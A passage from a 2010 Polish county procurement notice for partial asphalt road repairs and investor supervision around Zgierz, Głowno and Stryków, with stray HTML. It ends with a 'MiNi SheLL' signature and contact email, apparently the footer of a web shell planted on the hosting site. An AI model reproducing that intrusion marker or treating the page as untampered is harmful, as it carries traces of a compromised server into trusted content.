9	Wykonanie nakładki na drodze powiatowej Nr 5125 E na odcinku Głowno (ul. Ostrołęcka) - Ostrołęka, gm. Głowno. 	200 000,00 zł
10	Remont  cząstkowy nawierzchni bitumicznych mieszanką mineralno -asfaltową na terenie gminy Zgierz	88.000,00 zł
11	Remont cząstkowy nawierzchni bitumicznych mieszanką mineralno - asfaltową, na terenie  gminy Głowno	88.000,00 zł
12	Remont cząstkowy nawierzchni bitumicznych mieszanką mineralno - asfaltową, na terenie miasta i gminy Stryków	88.000,00 zł
13	Remont  cząstkowy nawierzchni  bitumicznych przy użyciu emulsji asfaltowej i grysów na terenie gminy Zgierz	47.000,00 zł
14	Remont  cząstkowy nawierzchni  bitumicznych przy użyciu emulsji asfaltowej   i grysów na terenie  gminy Głowno	47.000,00 zł
15	Remont  cząstkowy nawierzchni  bitumicznych przy użyciu emulsji asfaltowej   i grysów na terenie miasta i gminy Stryków	47.000,00 zł

Termin wykonania zamówienia:

1)	Od dnia zawarcia umowy do dnia 31.12.2010r. 
2)	Nadzór inwestorski nad poszczególnymi etapami wchodzącymi w skład  poszczególnej części przedmiotu zamówienia,
3)	data rozpoczęcia: od dnia rozpoczęcia robót budowlanych przez wykonawcę robót budowlanych objętych usługą nadzoru inwestorskiego,
4)	data zakończenia: do dnia zakończenia i odbioru wszystkich robót oraz przekazania do użytkowania nadzorowanej inwestycji.

Na co najmniej 7 dni przed planowanym terminem rozpoczęcia robót budowlanych objętych usługą nadzoru inwestorskiego Naczelnik Wydziału Drogownictwa Starostwa Powiatowego w Zgierzu na piśmie zawiadomi Wykonawcę o terminie rozpoczęcia usługi realizowanej w ramach danego etapu poszczególnej części przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com